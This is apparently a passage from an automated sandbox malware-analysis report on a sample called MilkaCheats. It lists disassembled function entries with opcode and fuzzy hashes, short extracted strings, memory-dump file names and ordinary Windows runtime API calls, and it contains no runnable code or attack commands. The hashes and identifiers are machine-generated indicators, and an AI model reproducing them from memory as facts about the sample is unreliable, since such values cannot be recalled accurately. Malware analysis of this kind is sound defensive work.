                                                                                              • Opcode Fuzzy Hash: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                                              • Instruction Fuzzy Hash: 20D1E271A08340ABD7059F24E842AEFBBE9DBD6310F19882CF98497242D775DC49DB93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: %*+($%*+(
                                                                                              • API String ID: 0-3039692684
                                                                                              • Opcode ID: 3edc26f54fc6f96b6ac74da4b34a405f423cdfc7cfe90740567c3347860ca026
                                                                                              • Instruction ID: 44789c02e2e7d0d1226e767c2045b81580b18e5bc0f483827717c83eae5518b6
                                                                                              • Opcode Fuzzy Hash: 3edc26f54fc6f96b6ac74da4b34a405f423cdfc7cfe90740567c3347860ca026
                                                                                              • Instruction Fuzzy Hash: 3AA137357083109BD729CB68DC91BABB7E1EB8C314F14893DE985D7292EB34E940C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$8
                                                                                              • API String ID: 0-46163386
                                                                                              • Opcode ID: 838afa22ea1f7ffa5fe9ba21136936bdf1f17e628c4be68406256da8559593a0
                                                                                              • Instruction ID: 59a405dd1b0cd974e97d72f778238365ab1aca3e8b068c1f4b250f498252b91a
                                                                                              • Opcode Fuzzy Hash: 838afa22ea1f7ffa5fe9ba21136936bdf1f17e628c4be68406256da8559593a0
                                                                                              • Instruction Fuzzy Hash: 6D31D23660D3858FD311CA68C48469FFBE2AFEA354F48895DE4C497352CA74D909CB92
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000D4E0E,?,?,00000008,?,?,000E34B0,00000000), ref: 000D5040
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 04a000fc70ec7f43c0a48e8d1629af448c8a7cac089f5fcd09365eae28d3b36c
                                                                                              • Instruction ID: 7ead9330d6fb5ec56e4a6d3c759753f9001993e926bbd0a90d29f76798125fe5
                                                                                              • Opcode Fuzzy Hash: 04a000fc70ec7f43c0a48e8d1629af448c8a7cac089f5fcd09365eae28d3b36c
                                                                                              • Instruction Fuzzy Hash: E4B118312107099FD764CF28C886B657BE0FF45365F258669E89ACF3A1C335E992CB50
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000C7122
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 66aae7a4e08a64924d830ea6fb66003aa4519b8716cda559b830e14b342d4b28
                                                                                              • Instruction ID: 7a2511586779ab2f177e035dfc800e4b97caa53f08644d4a0ae91fc385ddd6e8
                                                                                              • Opcode Fuzzy Hash: 66aae7a4e08a64924d830ea6fb66003aa4519b8716cda559b830e14b342d4b28
                                                                                              • Instruction Fuzzy Hash: 3CA19D759156059FDB18CF58D882BADBBF6FB49320F29812ED819E7A60C3B499C0CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ' SZ
                                                                                              • API String ID: 0-1053079558
                                                                                              • Opcode ID: 1a562f3a46396350bca214a8895319665ebac12cd9b8ea38f6bb1bd7357b19e8
                                                                                              • Instruction ID: 589e5e406e04f8c79e388b5dcdbbd52b3defe9622ae69a21ee86274ad62b5415
                                                                                              • Opcode Fuzzy Hash: 1a562f3a46396350bca214a8895319665ebac12cd9b8ea38f6bb1bd7357b19e8
                                                                                              • Instruction Fuzzy Hash: 64E128302047828FD7298B39C4907A2BBE2AFA7314F1985ACD4D64F7D6C779A846CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Y!
                                                                                              • API String ID: 0-2222236823
                                                                                              • Opcode ID: 44f56a3e0c808689ffa54ba9031cba8359a2877d00e67e35a48a7f930c708c93
                                                                                              • Instruction ID: 1a7fe65fc6593daaef19a1f518d9a62d054dcd1715f6189c0d7d8a38ee5f388f
                                                                                              • Opcode Fuzzy Hash: 44f56a3e0c808689ffa54ba9031cba8359a2877d00e67e35a48a7f930c708c93
                                                                                              • Instruction Fuzzy Hash: E2C13672A046108BD718DB24D8526BBB7E2EF95724F09853CF8C58B392E738DD85C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ~^Pf
                                                                                              • API String ID: 0-3538719280
                                                                                              • Opcode ID: fcf5e9002738e74fb6e6bc7ba6a727c98c5c51d942af80ad7f26d954ff4c7fc5
                                                                                              • Instruction ID: dfcb1f63a02fe59d82ad7d1d4aa948f4a5c571958650984f8260fb3a4f73eaf5
                                                                                              • Opcode Fuzzy Hash: fcf5e9002738e74fb6e6bc7ba6a727c98c5c51d942af80ad7f26d954ff4c7fc5
                                                                                              • Instruction Fuzzy Hash: B5D1BD756047418FD329CF29C450762FBE2AF96314F28C6ADD4EA8B7A2C739D846CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "
                                                                                              • API String ID: 0-123907689
                                                                                              • Opcode ID: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                                              • Instruction ID: 111e699ce8b6fc32902bd0270e4b735fc404d667dff2a09b9ecfc8c4d8b44380
                                                                                              • Opcode Fuzzy Hash: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                                              • Instruction Fuzzy Hash: 53D118B2A083105FD718CE24D481BABBBE6AF95354F19853DE899C7381E734DD84C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: _a1c
                                                                                              • API String ID: 0-3923334831
                                                                                              • Opcode ID: 69ae0ed3bd97d48e93cdc9e50c7d5bd1abc65dadb251b0cc80b723393a68fc2b
                                                                                              • Instruction ID: df7a00e9c5cc912ed9a65ee7255a29503c806ca2406f3798c95aa6eaca894d6e
                                                                                              • Opcode Fuzzy Hash: 69ae0ed3bd97d48e93cdc9e50c7d5bd1abc65dadb251b0cc80b723393a68fc2b
                                                                                              • Instruction Fuzzy Hash: E8C1F1B59093118BD3158F24C8813ABBBE2EFD5754F188A2CE4C55B3A5D774C982CB86
                                                                                              APIs
                                                                                              • _Deallocate.LIBCONCRT ref: 000C4D85
                                                                                                • Part of subcall function 000C1575: __EH_prolog3_catch.LIBCMT ref: 000C157C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeallocateH_prolog3_catch
                                                                                              • String ID:
                                                                                              • API String ID: 20358830-0
                                                                                              • Opcode ID: 9f2e1524070fdeb75737c359b4b60c04fb161b5dff844a0bef9cbc2d86fd044f
                                                                                              • Instruction ID: 564d7e83820b381f19fafe280a8418dc2bc70a1ff92c020f391069832c27b46e
                                                                                              • Opcode Fuzzy Hash: 9f2e1524070fdeb75737c359b4b60c04fb161b5dff844a0bef9cbc2d86fd044f
                                                                                              • Instruction Fuzzy Hash: 984167719193529FC394DF68888095FFBE8FB89710F440A2EF984DB351E330DA018B92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 13c28ddcc3cd2f3c9792e811e29e91eefb9bcede04e74da7d9b8ef8bc9586b84
                                                                                              • Instruction ID: e69d287121b4fc1f126c198d78c31cfa913117a1200645cf33ecf303ab87440d
                                                                                              • Opcode Fuzzy Hash: 13c28ddcc3cd2f3c9792e811e29e91eefb9bcede04e74da7d9b8ef8bc9586b84
                                                                                              • Instruction Fuzzy Hash: 35C19D70A046868FCB74CF68C484FBEBBE2AB45314F24462DE4579B2A2C731AD46CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8977
                                                                                              • API String ID: 0-400282742
                                                                                              • Opcode ID: 260720bded5ebe0c085c50f3c04ff5b3840a6d228c069c1f1f0eb7ee3ad91b64
                                                                                              • Instruction ID: c31f30fe50ff38d853c810fc46fc7f481977bef2f616ae72c549d6d3a4f5b97a
                                                                                              • Opcode Fuzzy Hash: 260720bded5ebe0c085c50f3c04ff5b3840a6d228c069c1f1f0eb7ee3ad91b64
                                                                                              • Instruction Fuzzy Hash: 2CA14372A043506FE7189E289C417BBB7E5ABC5314F094A2CFE95D7252EB35EC048792
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DE1FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 3736152602-0
                                                                                              • Opcode ID: 1472c32d7899857d8583fc4b943c0ba56fb88ed1ccfc909f6b4c9718f75a5d5c
                                                                                              • Instruction ID: 7fdc3a38a9e66a424d8a3c530931ad23fca89578b5b013acfd2059bf0a1d656e
                                                                                              • Opcode Fuzzy Hash: 1472c32d7899857d8583fc4b943c0ba56fb88ed1ccfc909f6b4c9718f75a5d5c
                                                                                              • Instruction Fuzzy Hash: 0A219272A14346ABEB28AB24DC42ABA73ECEF45314B14017FF905DB242EB74ED44C760
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 9e03d8749efb084e4d3236a1f2697f77b77e45cd6a4540dc4961ce85ab784436
                                                                                              • Instruction ID: 69f69aa87bd1b981c4e4ea2d204fceec5306f13440ab4d0d5d5546ce8a310d7c
                                                                                              • Opcode Fuzzy Hash: 9e03d8749efb084e4d3236a1f2697f77b77e45cd6a4540dc4961ce85ab784436
                                                                                              • Instruction Fuzzy Hash: 05B1B47090068A8BCBB8CFA4C491FBEB7F5EF41300F14062EE556A7292DB35AD45CB52
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • EnumSystemLocalesW.KERNEL32(000DDF54,00000001,00000000,?,-00000050,?,000DE585,00000000,?,?,?,00000055,?), ref: 000DDEA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: 8cd60ba6bf26e550e0934cfea74711bd3bb2b0d8bed279d7b5d12dbdcbee3bca
                                                                                              • Instruction ID: 7996204da9149b7f35899623c148f926392b99acfda1f213a92e7d65dc5aa713
                                                                                              • Opcode Fuzzy Hash: 8cd60ba6bf26e550e0934cfea74711bd3bb2b0d8bed279d7b5d12dbdcbee3bca
                                                                                              • Instruction Fuzzy Hash: 5811C63A2007055FDF18AF39D8915BAB791FB90358B14482FE6478BB40D371A942C750
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,000DE170,00000000,00000000,?), ref: 000DE402
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 3736152602-0
                                                                                              • Opcode ID: d70edbdc045944395db2b8293b31686f01aca8d688aba91c33b2a449d7de83f4
                                                                                              • Instruction ID: 26ecc70f370fe7dc73a1baf57baa952ec19692d060c08be17e72e3685c5e49c6
                                                                                              • Opcode Fuzzy Hash: d70edbdc045944395db2b8293b31686f01aca8d688aba91c33b2a449d7de83f4
                                                                                              • Instruction Fuzzy Hash: F8F0F932A40355ABDB246B64C805BBF7798DB40754F55482AED06A7280DA74FD41C5B0
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • EnumSystemLocalesW.KERNEL32(000DE1A7,00000001,?,?,-00000050,?,000DE549,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 000DDF13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2417226690-0
                                                                                              • Opcode ID: f9996562bba6d22bb8a8f29b840e16ba0971d62164c824dbde37c3b54f9af08b
                                                                                              • Instruction ID: 17476c54ccac888766fcd361014cf2cc210064c04f0fc0ebc9b9f361b4ccaf59
                                                                                              • Opcode Fuzzy Hash: f9996562bba6d22bb8a8f29b840e16ba0971d62164c824dbde37c3b54f9af08b
                                                                                              • Instruction Fuzzy Hash: 0BF0C23A2043045FDB246F359881ABA7BD5EB80768B05443FFA068B781D6B1AC02CA60
                                                                                              APIs
                                                                                                • Part of subcall function 000CF8B0: EnterCriticalSection.KERNEL32(?,?,000D3ED8,?,000ED8D0,00000008,000D409C,?,?,?), ref: 000CF8BF
                                                                                              • EnumSystemLocalesW.KERNEL32(000D54F0,00000001,000ED970,0000000C,000D58C2,00000000), ref: 000D5535
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
